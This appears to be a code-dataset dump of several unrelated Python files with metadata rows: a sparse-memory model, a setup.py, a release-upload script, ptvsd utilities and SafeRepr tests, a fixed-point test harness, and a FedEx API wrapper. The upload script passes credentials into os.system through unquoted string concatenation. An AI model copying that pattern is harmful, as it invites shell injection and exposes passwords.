self.rows = subprocess.Popen("tput lines").read()
except (ValueError, IOError, OSError):
self.rows = 20
"""
The function that overwrites "sys.stdout.write", and
counts the number of lines in what is being "printed".
"""
def write(self, data):
if not self.editing:
self.count_lines(data)
self.stdout.write(data)
def flush(self):
self.stdout.flush()
# Counts lines
def count_lines(self, data):
datalines = len(str(data).split("\n")) - 1
self.lines += datalines
self.data += data
| mit | -5,066,193,894,276,154,000 | 24.090909 | 61 | 0.605978 | false | 3.873684 | false | false | false |
mobarski/sandbox | rsm/v1.py | 2 | 3677 | from common import *
# TODO rename -> pooling/random/sparse/distributed hebbian/horde/crowd/fragment/sample memory
# NEW NAME: random sample memory / fruit fly memory
# TODO vol/mem_cnt_score_boost
# TODO focus
# TODO focus boost
# TODO noise boost
# TODO auto noise
# TODO auto focus
class rsm:
def __init__(self, n, m):
"""
n -- number of neurons
m -- max number of synapses
"""
self.mem = {j:set() for j in range(n)} # memory
self.vol = {j:set() for j in range(n)} # volatile memory -- "Once is never. Twice is always."
self.free = {j:m for j in range(n)}
self.mem_cnt = {}
self.vol_cnt = {}
self.ofreq = {j:0 for j in range(n)} # output frequency
self.noise = set() # ignored inputs
self.focus = set() # valuable inputs
self.cfg = dict(n=n,m=m)
self.cnt = 0
def save(self, f):
v=2
pos0 = f.tell()
marshal.dump(self.cfg,f,v)
marshal.dump(self.mem,f,v)
marshal.dump(self.vol,f,v)
marshal.dump(self.mem_cnt,f,v)
marshal.dump(self.vol_cnt,f,v)
marshal.dump(self.free,f,v)
marshal.dump(self.ofreq,f,v)
marshal.dump(self.noise,f,v)
marshal.dump(self.focus,f,v)
marshal.dump(self.cnt,f,v)
return f.tell()-pos0
def score(self, input, boost=False):
""
inp = set(input) - self.noise
mem = self.mem
free = self.free
free_score_boost = 0.9
if boost:
score = {j:free_score_boost*free[j]+len(inp & mem[j]) for j in mem}
else:
score = {j:len(inp & mem[j]) for j in mem}
return score
def learn(self, input, k):
mem = self.mem
vol = self.vol
mem_cnt = self.mem_cnt
vol_cnt = self.vol_cnt
free = self.free
ofreq = self.ofreq
self.cnt += 1
inp = set(input) - self.noise
score = self.score(input, boost=True)
winners = top(k,score)
for j in winners:
ofreq[j] += 1 # update output frequency
# known inputs
known = inp & mem[j]
confirmed = inp & vol[j] # confirmed: seen for the second time
vol[j].difference_update(confirmed)
for i in confirmed:
vol_cnt[i] -= 1
# unknown inputs
unknown = inp - mem[j]
u_by_f = list(unknown) # TODO
if free[j]:
# TODO .focus
new = u_by_f[:free[j]]
if new:
mem[j].update(new)
vol[j].update(new)
free[j] -= len(new)
for i in new:
mem_cnt[i] = mem_cnt.get(i,0)+1
vol_cnt[i] = vol_cnt.get(i,0)+1
elif unknown:
# TODO how many ???
if vol[j]:
# TODO random pick using mem_cnt and vol_cnt
# TODO .focus
i = vol[j].pop()
mem[j].remove(i)
mem_cnt[i] -= 1
vol_cnt[i] -= 1
elif confirmed:
# TODO random pick using mem_cnt and vol_cnt
# TODO .focus
i = confirmed.pop()
mem[j].remove(i)
mem_cnt[i] -= 1
else:
# TODO random pick using mem_cnt and vol_cnt
# TODO .focus
i = mem[j].pop()
mem_cnt[i] -= 1
i = u_by_f[0] # TODO .focus
mem[j].add(i)
vol[j].add(i)
mem_cnt[i] = mem_cnt.get(i,0)+1
vol_cnt[i] = vol_cnt.get(i,0)+1
return score
# not used
def forget(self,value):
"remove value from memory"
mem = self.mem
free = self.free
for j in mem:
if value in mem[j]:
mem[j].remove(value)
free[j] += 1
if __name__=="__main__":
t0=time()
mm = rsm(100,5)
clock('init',t0)
X = [random_vector(0,9,30) for _ in range(10)]
x = X[0]
t0 = time()
s = mm.score(x)
clock('score',t0)
print(sum(top(3,s,values=True)))
t0 = time()
for _ in range(10):
for x in X:
mm.learn(x,10)
clock('learn',t0)
for x in X:
s = mm.score(x)
print(sum(top(3,s,values=True)))
t0=time()
size=mm.save(open('data/v1.model','wb'))
clock('save',t0)
print('size:',size//1024,'KB')
#
print(X[0])
print(mm.mem)
print(mm.free)
print(mm.vol) | mit | 494,271,387,442,654,200 | 22.278481 | 95 | 0.595866 | false | 2.457888 | false | false | false |
ananthb/binder | setup.py | 1 | 1341 | """
binder
~~~~~~
binder is a learning social network. It helps you find and learn with
other students. Give it a whirl. Sign up today!
binder is also open source software and available under the MIT license.
:copyright: (c) 2015 by Ananth Bhaskararaman
:license: MIT, see LICENSE for more details
"""
import sys
if sys.version < '3.2.0':
raise RuntimeError("You need at least python 3.4 for binder to work.")
from setuptools import setup
install_requires = [
'Flask==0.10.1',
'Flask-Bootstrap==3.3.5.6',
'Flask-Menu==0.4.0',
'Flask-Script==2.0.5',
'Flask-SQLAlchemy==2.0',
'SQLAlchemy==1.0.8',
'Flask-Login==0.2.11',
'rq==0.5.5',
'Flask-Dance==0.7.0',
'blinker==1.4',
'flask-log==0.1.0'
]
if '3.2.0' < sys.version < '3.4.0':
install_requires.append('enum34==1.0.4')
setup(
name='binder',
version='0.0.4',
description='Brings students closer.',
license='MIT',
long_description=__doc__,
packages=['binder', 'binder.pages'],
author='Ananth Bhaskararaman',
author_email='[email protected]',
url='http://github.com/ananthb/binder',
platforms='any',
install_requires=install_requires,
entry_points={
'console_scripts': [
'binder = binder:binder_app'
],
},
zip_safe=True,
)
| mit | -1,047,073,338,729,103,500 | 22.526316 | 76 | 0.607755 | false | 2.98 | false | false | false |
Xervmon/XervSync | duplicati/Installer/upload.py | 1 | 5342 | #!/usr/bin/env python
import sys
import os
import glob
def main():
source_folder = os.path.join('bin', 'release')
new_version = None
suggest_string = ''
for testfile in glob.glob( os.path.join(source_folder, 'Duplicati *.zip') ):
version_info = testfile[testfile.rfind('Duplicati ') + len('Duplicati '):- len('.zip')]
if new_version is None:
new_version = version_info
suggest_string = '[' + new_version + ']'
else:
sys.stdout.write('More than one file matching, no auto suggests for you!\n')
suggest_string = ''
new_version = None
break
sys.stdout.write('Please enter file version number ' + suggest_string + ': ')
file_version = sys.stdin.readline().rstrip()
if (file_version is None or len(file_version) == 0):
file_version = new_version
if (file_version is None or len(file_version) == 0):
sys.stdout.write('No name given, exiting\n')
sys.exit(-1)
summary_base = "Duplicati " + file_version
filename_base = "Duplicati " + file_version
sys.stdout.write('Please enter description [' + summary_base + ']: ')
tmp = file_version = sys.stdin.readline().rstrip()
if (len(tmp) != 0):
sumary_base = tmp
filename_zip = filename_base + ".zip"
filename_msi_x86 = filename_base + ".msi"
filename_msi_x64 = filename_base + ".x64.msi"
filename_deb = filename_base + ".deb"
filename_dmg = filename_base + ".dmg"
filename_rpm = filename_base + ".noarch.rpm"
filename_tgz = filename_base + ".tgz"
filename_zip = os.path.join(source_folder, filename_zip)
filename_msi_x86 = os.path.join(source_folder, filename_msi_x86)
filename_msi_x64 = os.path.join(source_folder, filename_msi_x64)
filename_deb = os.path.join(source_folder, filename_deb)
filename_dmg = os.path.join(source_folder, filename_dmg)
filename_rpm = os.path.join(source_folder, filename_rpm)
filename_tgz = os.path.join(source_folder, filename_tgz)
username = None
password = None
upload_count = 0
try:
with open('account_info', 'r') as f:
username = f.readline().strip()
password = f.readline().strip()
except IOError as e:
None
if (username is None or len(username) == 0 or password is None or len(password) == 0):
sys.stdout.write("username or password was empty\n")
sys.stdout.write("please make a file called account_info with the\n")
sys.stdout.write("username on the first line and the\n")
sys.stdout.write("google code password on the second line\n")
return -1
if (os.path.exists(filename_zip)):
sys.stdout.write('Uploading file: ' + filename_zip + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Binaries" --project="duplicati" --labels="Type-Archive,OpSys-All" "' + filename_zip + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (os.path.exists(filename_msi_x86)):
sys.stdout.write('Uploading file: ' + filename_msi_x86 + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Windows" --project="duplicati" --labels="Type-Installer,OpSys-Windows" "' + filename_msi_x86 + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (os.path.exists(filename_msi_x64)):
sys.stdout.write('Uploading file: ' + filename_msi_x64 + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Windows 64bit" --project="duplicati" --labels="Type-Installer,OpSys-Windows" "' + filename_msi_x64 + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (os.path.exists(filename_deb)):
sys.stdout.write('Uploading file: ' + filename_deb + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Debian package" --project="duplicati" --labels="Type-Installer,OpSys-Linux" "' + filename_deb + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (os.path.exists(filename_rpm)):
sys.stdout.write('Uploading file: ' + filename_rpm + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Fedora package" --project="duplicati" --labels="Type-Installer,OpSys-Linux" "' + filename_rpm + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (os.path.exists(filename_dmg)):
sys.stdout.write('Uploading file: ' + filename_dmg + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Mac OSX image" --project="duplicati" --labels="Type-Installer,OpSys-OSX" "' + filename_dmg + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (os.path.exists(filename_tgz)):
sys.stdout.write('Uploading file: ' + filename_tgz + '\n')
os.system('python googlecode_upload.py --summary="' + summary_base + ' - Linux tgz package" --project="duplicati" --labels="Type-Installer,OpSys-Linux" "' + filename_tgz + '" --user="' + username + '" --password="' + password + '"')
upload_count+=1
if (upload_count == 0):
sys.stdout.write('No files uploaded, wrong filename?')
else:
sys.stdout.write('All uploaded !')
if __name__ == '__main__':
sys.exit(main())
| gpl-3.0 | 7,946,786,659,490,272,000 | 42.516667 | 238 | 0.624298 | false | 3.334582 | false | false | false |
SlicerRt/SlicerDebuggingTools | PyDevRemoteDebug/ptvsd-3.2.1/ptvsd/util.py | 1 | 22941 | # Python Tools for Visual Studio
# Copyright(c) Microsoft Corporation
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the License); you may not use
# this file except in compliance with the License. You may obtain a copy of the
# License at http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY
# IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
#
# See the Apache Version 2.0 License for specific language governing
# permissions and limitations under the License.
__author__ = "Microsoft Corporation <[email protected]>"
__version__ = "3.2.1.0"
# This module MUST NOT import threading in global scope. This is because in a direct (non-ptvsd)
# attach scenario, it is loaded on the injected debugger attach thread, and if threading module
# hasn't been loaded already, it will assume that the thread on which it is being loaded is the
# main thread. This will cause issues when the thread goes away after attach completes.
import imp
import os
import sys
import struct
# Import encodings early to avoid import on the debugger thread, which may cause deadlock
from encodings import utf_8, ascii
# WARNING: Avoid imports beyond this point, specifically on the debugger thread, as this may cause
# deadlock where the debugger thread performs an import while a user thread has the import lock
# Py3k compat - alias unicode to str, and xrange to range
try:
unicode
except:
unicode = str
try:
xrange
except:
xrange = range
if sys.version_info[0] >= 3:
def to_bytes(cmd_str):
return ascii.Codec.encode(cmd_str)[0]
else:
def to_bytes(cmd_str):
return cmd_str
def exec_code(code, file, global_variables):
'''Executes the provided code as if it were the original script provided
to python.exe. The functionality is similar to `runpy.run_path`, which was
added in Python 2.7/3.2.
The following values in `global_variables` will be set to the following
values, if they are not already set::
__name__ = '<run_path>'
__file__ = file
__package__ = __name__.rpartition('.')[0] # 2.6 and later
__cached__ = None # 3.2 and later
__loader__ = None # 3.3 and later
The `sys.modules` entry for ``__name__`` will be set to a new module, and
``sys.path[0]`` will be changed to the value of `file` without the filename.
Both values are restored when this function exits.
'''
original_main = sys.modules.get('__main__')
global_variables = dict(global_variables)
mod_name = global_variables.setdefault('__name__', '<run_path>')
mod = sys.modules[mod_name] = imp.new_module(mod_name)
mod.__dict__.update(global_variables)
global_variables = mod.__dict__
global_variables.setdefault('__file__', file)
if sys.version_info[0] >= 3 or sys.version_info[1] >= 6:
global_variables.setdefault('__package__', mod_name.rpartition('.')[0])
if sys.version_info[0] >= 3:
if sys.version_info[1] >= 2:
global_variables.setdefault('__cached__', None)
if sys.version_info[1] >= 3:
try:
global_variables.setdefault('__loader__', original_main.__loader__)
except AttributeError:
pass
if os.path.isdir(sys.path[0]):
sys.path.insert(0, os.path.split(file)[0])
else:
sys.path[0] = os.path.split(file)[0]
code_obj = compile(code, file, 'exec')
exec(code_obj, global_variables)
def exec_file(file, global_variables):
'''Executes the provided script as if it were the original script provided
to python.exe. The functionality is similar to `runpy.run_path`, which was
added in Python 2.7/3.2.
The following values in `global_variables` will be set to the following
values, if they are not already set::
__name__ = '<run_path>'
__file__ = file
__package__ = __name__.rpartition('.')[0] # 2.6 and later
__cached__ = None # 3.2 and later
__loader__ = sys.modules['__main__'].__loader__ # 3.3 and later
The `sys.modules` entry for ``__name__`` will be set to a new module, and
``sys.path[0]`` will be changed to the value of `file` without the filename.
Both values are restored when this function exits.
'''
f = open(file, "rb")
try:
code = f.read().replace(to_bytes('\r\n'), to_bytes('\n')) + to_bytes('\n')
finally:
f.close()
exec_code(code, file, global_variables)
def exec_module(module, global_variables):
'''Executes the provided module as if it were provided as '-m module'. The
functionality is implemented using `runpy.run_module`, which was added in
Python 2.5.
'''
import runpy
runpy.run_module(module, global_variables, run_name=global_variables.get('__name__'), alter_sys=True)
UNICODE_PREFIX = to_bytes('U')
ASCII_PREFIX = to_bytes('A')
NONE_PREFIX = to_bytes('N')
def read_bytes(conn, count):
b = to_bytes('')
while len(b) < count:
received_data = conn.recv(count - len(b))
if received_data is None:
break
b += received_data
return b
def write_bytes(conn, b):
conn.sendall(b)
def read_int(conn):
return struct.unpack('!q', read_bytes(conn, 8))[0]
def write_int(conn, i):
write_bytes(conn, struct.pack('!q', i))
def read_string(conn):
""" reads length of text to read, and then the text encoded in UTF-8, and returns the string"""
strlen = read_int(conn)
if not strlen:
return ''
res = to_bytes('')
while len(res) < strlen:
res = res + conn.recv(strlen - len(res))
res = utf_8.decode(res)[0]
if sys.version_info[0] == 2 and sys.platform != 'cli':
# Py 2.x, we want an ASCII string if possible
try:
res = ascii.Codec.encode(res)[0]
except UnicodeEncodeError:
pass
return res
def write_string(conn, s):
if s is None:
write_bytes(conn, NONE_PREFIX)
elif isinstance(s, unicode):
b = utf_8.encode(s)[0]
b_len = len(b)
write_bytes(conn, UNICODE_PREFIX)
write_int(conn, b_len)
if b_len > 0:
write_bytes(conn, b)
else:
s_len = len(s)
write_bytes(conn, ASCII_PREFIX)
write_int(conn, s_len)
if s_len > 0:
write_bytes(conn, s)
class SafeRepr(object):
# String types are truncated to maxstring_outer when at the outer-
# most level, and truncated to maxstring_inner characters inside
# collections.
maxstring_outer = 2 ** 16
maxstring_inner = 30
if sys.version_info >= (3, 0):
string_types = (str, bytes)
set_info = (set, '{', '}', False)
frozenset_info = (frozenset, 'frozenset({', '})', False)
else:
string_types = (str, unicode)
set_info = (set, 'set([', '])', False)
frozenset_info = (frozenset, 'frozenset([', '])', False)
# Collection types are recursively iterated for each limit in
# maxcollection.
maxcollection = (15, 10)
# Specifies type, prefix string, suffix string, and whether to include a
# comma if there is only one element. (Using a sequence rather than a
# mapping because we use isinstance() to determine the matching type.)
collection_types = [
(tuple, '(', ')', True),
(list, '[', ']', False),
frozenset_info,
set_info,
]
try:
from collections import deque
collection_types.append((deque, 'deque([', '])', False))
except:
pass
# type, prefix string, suffix string, item prefix string, item key/value separator, item suffix string
dict_types = [(dict, '{', '}', '', ': ', '')]
try:
from collections import OrderedDict
dict_types.append((OrderedDict, 'OrderedDict([', '])', '(', ', ', ')'))
except:
pass
# All other types are treated identically to strings, but using
# different limits.
maxother_outer = 2 ** 16
maxother_inner = 30
def __call__(self, obj):
try:
return ''.join(self._repr(obj, 0))
except:
try:
return 'An exception was raised: %r' % sys.exc_info()[1]
except:
return 'An exception was raised'
def _repr(self, obj, level):
'''Returns an iterable of the parts in the final repr string.'''
try:
obj_repr = type(obj).__repr__
except:
obj_repr = None
def has_obj_repr(t):
r = t.__repr__
try:
return obj_repr == r
except:
return obj_repr is r
for t, prefix, suffix, comma in self.collection_types:
if isinstance(obj, t) and has_obj_repr(t):
return self._repr_iter(obj, level, prefix, suffix, comma)
for t, prefix, suffix, item_prefix, item_sep, item_suffix in self.dict_types:
if isinstance(obj, t) and has_obj_repr(t):
return self._repr_dict(obj, level, prefix, suffix, item_prefix, item_sep, item_suffix)
for t in self.string_types:
if isinstance(obj, t) and has_obj_repr(t):
return self._repr_str(obj, level)
if self._is_long_iter(obj):
return self._repr_long_iter(obj)
return self._repr_other(obj, level)
# Determines whether an iterable exceeds the limits set in maxlimits, and is therefore unsafe to repr().
def _is_long_iter(self, obj, level = 0):
try:
# Strings have their own limits (and do not nest). Because they don't have __iter__ in 2.x, this
# check goes before the next one.
if isinstance(obj, self.string_types):
return len(obj) > self.maxstring_inner
# If it's not an iterable (and not a string), it's fine.
if not hasattr(obj, '__iter__'):
return False
# Iterable is its own iterator - this is a one-off iterable like generator or enumerate(). We can't
# really count that, but repr() for these should not include any elements anyway, so we can treat it
# the same as non-iterables.
if obj is iter(obj):
return False
# xrange reprs fine regardless of length.
if isinstance(obj, xrange):
return False
# numpy and scipy collections (ndarray etc) have self-truncating repr, so they're always safe.
try:
module = type(obj).__module__.partition('.')[0]
if module in ('numpy', 'scipy'):
return False
except:
pass
# Iterables that nest too deep are considered long.
if level >= len(self.maxcollection):
return True
# It is too long if the length exceeds the limit, or any of its elements are long iterables.
if hasattr(obj, '__len__'):
try:
l = len(obj)
except:
l = None
if l is not None and l > self.maxcollection[level]:
return True
return any((self._is_long_iter(item, level + 1) for item in obj))
return any(i > self.maxcollection[level] or self._is_long_iter(item, level + 1) for i, item in enumerate(obj))
except:
# If anything breaks, assume the worst case.
return True
def _repr_iter(self, obj, level, prefix, suffix, comma_after_single_element = False):
yield prefix
if level >= len(self.maxcollection):
yield '...'
else:
count = self.maxcollection[level]
yield_comma = False
for item in obj:
if yield_comma:
yield ', '
yield_comma = True
count -= 1
if count <= 0:
yield '...'
break
for p in self._repr(item, 100 if item is obj else level + 1):
yield p
else:
if comma_after_single_element and count == self.maxcollection[level] - 1:
yield ','
yield suffix
def _repr_long_iter(self, obj):
try:
obj_repr = '<%s, len() = %s>' % (type(obj).__name__, len(obj))
except:
try:
obj_repr = '<' + type(obj).__name__ + '>'
except:
obj_repr = '<no repr available for object>'
yield obj_repr
def _repr_dict(self, obj, level, prefix, suffix, item_prefix, item_sep, item_suffix):
if not obj:
yield prefix + suffix
return
if level >= len(self.maxcollection):
yield prefix + '...' + suffix
return
yield prefix
count = self.maxcollection[level]
yield_comma = False
try:
sorted_keys = sorted(obj)
except Exception:
sorted_keys = list(obj)
for key in sorted_keys:
if yield_comma:
yield ', '
yield_comma = True
count -= 1
if count <= 0:
yield '...'
break
yield item_prefix
for p in self._repr(key, level + 1):
yield p
yield item_sep
try:
item = obj[key]
except Exception:
yield '<?>'
else:
for p in self._repr(item, 100 if item is obj else level + 1):
yield p
yield item_suffix
yield suffix
def _repr_str(self, obj, level):
return self._repr_obj(obj, level, self.maxstring_inner, self.maxstring_outer)
def _repr_other(self, obj, level):
return self._repr_obj(obj, level, self.maxother_inner, self.maxother_outer)
def _repr_obj(self, obj, level, limit_inner, limit_outer):
try:
obj_repr = repr(obj)
except:
try:
obj_repr = object.__repr__(obj)
except:
try:
obj_repr = '<no repr available for ' + type(obj).__name__ + '>'
except:
obj_repr = '<no repr available for object>'
limit = limit_inner if level > 0 else limit_outer
if limit >= len(obj_repr):
yield obj_repr
return
# Slightly imprecise calculations - we may end up with a string that is
# up to 3 characters longer than limit. If you need precise formatting,
# you are using the wrong class.
left_count, right_count = max(1, int(2 * limit / 3)), max(1, int(limit / 3))
yield obj_repr[:left_count]
yield '...'
yield obj_repr[-right_count:]
def _selftest(self):
# Test the string limiting somewhat automatically
tests = []
tests.append((7, 9, 'A' * (5)))
tests.append((self.maxstring_outer + 3, self.maxstring_inner + 3 + 2, 'A' * (self.maxstring_outer + 10)))
if sys.version_info >= (3, 0):
tests.append((self.maxstring_outer + 4, self.maxstring_inner + 4 + 2, bytes('A', 'ascii') * (self.maxstring_outer + 10)))
else:
tests.append((self.maxstring_outer + 4, self.maxstring_inner + 4 + 2, unicode('A') * (self.maxstring_outer + 10)))
for limit1, limit2, value in tests:
assert len(self(value)) <= limit1 <= len(repr(value)), (len(self(value)), limit1, len(repr(value)), value)
assert len(self([value])) <= limit2 <= len(repr([value])), (len(self([value])), limit2, len(repr([value])), self([value]))
def test(source, expected):
actual = self(source)
if actual != expected:
print("Source " + repr(source))
print("Expect " + expected)
print("Actual " + actual)
print("")
assert False
def re_test(source, pattern):
import re
actual = self(source)
if not re.match(pattern, actual):
print("Source " + repr(source))
print("Pattern " + pattern)
print("Actual " + actual)
print("")
assert False
for ctype, _prefix, _suffix, comma in self.collection_types:
for i in range(len(self.maxcollection)):
prefix = _prefix * (i + 1)
if comma:
suffix = _suffix + ("," + _suffix) * i
else:
suffix = _suffix * (i + 1)
#print("ctype = " + ctype.__name__ + ", maxcollection[" + str(i) + "] == " + str(self.maxcollection[i]))
c1 = ctype(range(self.maxcollection[i] - 1))
inner_repr = prefix + ', '.join(str(j) for j in c1)
c2 = ctype(range(self.maxcollection[i]))
c3 = ctype(range(self.maxcollection[i] + 1))
for j in range(i):
c1, c2, c3 = ctype((c1,)), ctype((c2,)), ctype((c3,))
test(c1, inner_repr + suffix)
test(c2, inner_repr + ", ..." + suffix)
test(c3, inner_repr + ", ..." + suffix)
if ctype is set:
# Cannot recursively add sets to sets
break
# Assume that all tests apply equally to all iterable types and only
# test with lists.
c1 = list(range(self.maxcollection[0] * 2))
c2 = [c1 for _ in range(self.maxcollection[0] * 2)]
c1_expect = '[' + ', '.join(str(j) for j in range(self.maxcollection[0] - 1)) + ', ...]'
test(c1, c1_expect)
c1_expect2 = '[' + ', '.join(str(j) for j in range(self.maxcollection[1] - 1)) + ', ...]'
c2_expect = '[' + ', '.join(c1_expect2 for _ in range(self.maxcollection[0] - 1)) + ', ...]'
test(c2, c2_expect)
# Ensure dict keys and values are limited correctly
d1 = {}
d1_key = 'a' * self.maxstring_inner * 2
d1[d1_key] = d1_key
re_test(d1, "{'a+\.\.\.a+': 'a+\.\.\.a+'}")
d2 = {d1_key : d1}
re_test(d2, "{'a+\.\.\.a+': {'a+\.\.\.a+': 'a+\.\.\.a+'}}")
d3 = {d1_key : d2}
if len(self.maxcollection) == 2:
re_test(d3, "{'a+\.\.\.a+': {'a+\.\.\.a+': {\.\.\.}}}")
else:
re_test(d3, "{'a+\.\.\.a+': {'a+\.\.\.a+': {'a+\.\.\.a+': 'a+\.\.\.a+'}}}")
# Ensure empty dicts work
test({}, '{}')
# Ensure dict keys are sorted
d1 = {}
d1['c'] = None
d1['b'] = None
d1['a'] = None
test(d1, "{'a': None, 'b': None, 'c': None}")
if sys.version_info >= (3, 0):
# Ensure dicts with unsortable keys do not crash
d1 = {}
for _ in range(100):
d1[object()] = None
try:
list(sorted(d1))
assert False, "d1.keys() should be unorderable"
except TypeError:
pass
self(d1)
# Test with objects with broken repr implementations
class TestClass(object):
def __repr__(self):
raise NameError
try:
repr(TestClass())
assert False, "TestClass().__repr__ should have thrown"
except NameError:
pass
self(TestClass())
# Test with objects with long repr implementations
class TestClass(object):
repr_str = '<' + 'A' * self.maxother_outer * 2 + '>'
def __repr__(self):
return self.repr_str
re_test(TestClass(), r'\<A+\.\.\.A+\>')
# Test collections that don't override repr
class TestClass(dict): pass
test(TestClass(), '{}')
class TestClass(list): pass
test(TestClass(), '[]')
# Test collections that override repr
class TestClass(dict):
def __repr__(self): return 'MyRepr'
test(TestClass(), 'MyRepr')
class TestClass(list):
def __init__(self, iter = ()): list.__init__(self, iter)
def __repr__(self): return 'MyRepr'
test(TestClass(), 'MyRepr')
# Test collections and iterables with long repr
test(TestClass(xrange(0, 15)), 'MyRepr')
test(TestClass(xrange(0, 16)), '<TestClass, len() = 16>')
test(TestClass([TestClass(xrange(0, 10))]), 'MyRepr')
test(TestClass([TestClass(xrange(0, 11))]), '<TestClass, len() = 1>')
# Test strings inside long iterables
test(TestClass(['a' * (self.maxcollection[1] + 1)]), 'MyRepr')
test(TestClass(['a' * (self.maxstring_inner + 1)]), '<TestClass, len() = 1>')
# Test range
if sys.version[0] == '2':
range_name = 'xrange'
else:
range_name = 'range'
test(xrange(1, self.maxcollection[0] + 1), '%s(1, %s)' % (range_name, self.maxcollection[0] + 1))
# Test directly recursive collections
c1 = [1, 2]
c1.append(c1)
test(c1, '[1, 2, [...]]')
d1 = {1: None}
d1[2] = d1
test(d1, '{1: None, 2: {...}}')
# Find the largest possible repr and ensure it is below our arbitrary
# limit (8KB).
coll = '-' * (self.maxstring_outer * 2)
for limit in reversed(self.maxcollection[1:]):
coll = [coll] * (limit * 2)
dcoll = {}
for i in range(self.maxcollection[0]):
dcoll[str(i) * self.maxstring_outer] = coll
text = self(dcoll)
#try:
# text_repr = repr(dcoll)
#except MemoryError:
# print('Memory error raised while creating repr of test data')
# text_repr = ''
#print('len(SafeRepr()(dcoll)) = ' + str(len(text)) + ', len(repr(coll)) = ' + str(len(text_repr)))
assert len(text) < 8192
# Test numpy types - they should all use their native reprs, even arrays exceeding limits
try:
import numpy as np
except ImportError:
print('WARNING! could not import numpy - skipping all numpy tests.')
else:
test(np.int32(123), repr(np.int32(123)))
test(np.float64(123.456), repr(np.float64(123.456)))
test(np.zeros(self.maxcollection[0] + 1), repr(np.zeros(self.maxcollection[0] + 1)));
if __name__ == '__main__':
print('Running tests...')
SafeRepr()._selftest()
| bsd-3-clause | -7,209,905,003,792,995,000 | 35.356577 | 134 | 0.540081 | false | 3.914178 | true | false | false |
rtmilbourne/augur-core | tests/fixedpoint_tests/test_suite.py | 4 | 2236 | import cStringIO
import sys
_ = sys.stderr
sys.stderr = cStringIO.StringIO()
from pyethereum import tester as t
sys.stderr = _
from contextlib import contextmanager
from collections import namedtuple
from bitcoin import encode, decode
import random
import gmpy2
import time
gmpy2.get_context().precision = 256
_TestResultBase = namedtuple('_TestResultBase', 'avg_error avg_gas')
class TestResults(_TestResultBase):
def __str__(self):
return 'TestResults(avg_error={:3.18%}%, avg_gas={})'.format(self[0], self[1])
def suppress_output(thunk):
old_stdout = sys.stdout
sys.stdout = cStringIO.StringIO()
try:
result = thunk()
except:
old_stdout.write(sys.stdout.read())
sys.exit(1)
else:
sys.stdout = old_stdout
return result
def printf(fmt, *args):
sys.stdout.write(fmt % args)
sys.stdout.flush()
def test_thunk(thunk, trials):
printf('Testing ' + thunk.__name__ + ':\n')
error = 0
gas = 0
for i in range(int(trials)):
printf('\tTrials: %d\r', i)
expected, result = thunk()
result['output'] /= gmpy2.mpfr(1 << 64)
error += abs(result['output'] - expected)/expected
gas += result['gas']
printf('\n')
return TestResults(float(error/trials), gas/float(trials))
def thunks(contract, func_dict):
for name, (bounds, ref_func) in func_dict.items():
def thunk(name=name, bounds=bounds, ref_func=ref_func):
test_func = vars(contract)[name]
x = random.random()*(bounds[1] - bounds[0]) + bounds[0]
return ref_func(x), test_func(int(x*2**64), profiling=True)
thunk.__name__ = name
yield thunk
def compile(filename):
s = t.state()
start = time.time()
printf('Compiling...\t')
c = suppress_output(lambda: s.abi_contract(filename))
printf('Done in %.1f seconds.\n', time.time() - start)
return c
def test_code(filename, func_dict, trials):
contract = compile(filename)
for thunk in thunks(contract, func_dict):
printf('\t' + str(test_thunk(thunk, trials)) + '\n')
@contextmanager
def timer():
start = time.time()
yield
print
print "Runtime: %.2f seconds" % (time.time() - start)
| gpl-3.0 | 2,710,647,747,908,694,000 | 26.95 | 86 | 0.624329 | false | 3.302806 | true | false | false |
ryepdx/shipping_api_fedex | helpers/fedex_wrapper.py | 1 | 8884 | import base64, logging
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
from collections import namedtuple
from shipping import Package, get_country_code
from .fedex.services.rate_service import FedexRateServiceRequest
from .fedex.services.ship_service import FedexDeleteShipmentRequest, FedexProcessShipmentRequest
PACKAGES = [
('FEDEX_BOX', 'FedEx Box'),
('FEDEX_PAK', 'FedEx Pak'),
('FEDEX_TUBE', 'FedEx Tube'),
('YOUR_PACKAGING', 'Custom')
]
SERVICES = [
('STANDARD_OVERNIGHT', 'FedEx Standard Overnight'),
('PRIORITY_OVERNIGHT', 'FedEx Priority Overnight'),
('FEDEX_GROUND', 'FedEx Ground'),
('FEDEX_EXPRESS_SAVER', 'FedEx Express Saver')
]
Label = namedtuple("Label", ["tracking", "postage", "label", "format"])
class FedExError(Exception):
pass
class FedEx(object):
def __init__(self, config):
self.config = config
def _prepare_request(self, request, shipper, recipient, package):
request.RequestedShipment.DropoffType = 'REQUEST_COURIER'
request.RequestedShipment.PackagingType = 'YOUR_PACKAGING'#package.shape.code
# Shipper contact info.
#request.RequestedShipment.Shipper.Contact.PersonName = shipper.name or shipper.company_name
request.RequestedShipment.Shipper.Contact.CompanyName = shipper.company_name or shipper.name
request.RequestedShipment.Shipper.Contact.PhoneNumber = shipper.phone
# Shipper address.
request.RequestedShipment.Shipper.Address.StreetLines = [shipper.address1, shipper.address2]
request.RequestedShipment.Shipper.Address.City = shipper.city
request.RequestedShipment.Shipper.Address.StateOrProvinceCode = shipper.state
request.RequestedShipment.Shipper.Address.PostalCode = shipper.zip
request.RequestedShipment.Shipper.Address.CountryCode = shipper.country_code
request.RequestedShipment.Shipper.Address.Residential = False
# Recipient contact info.
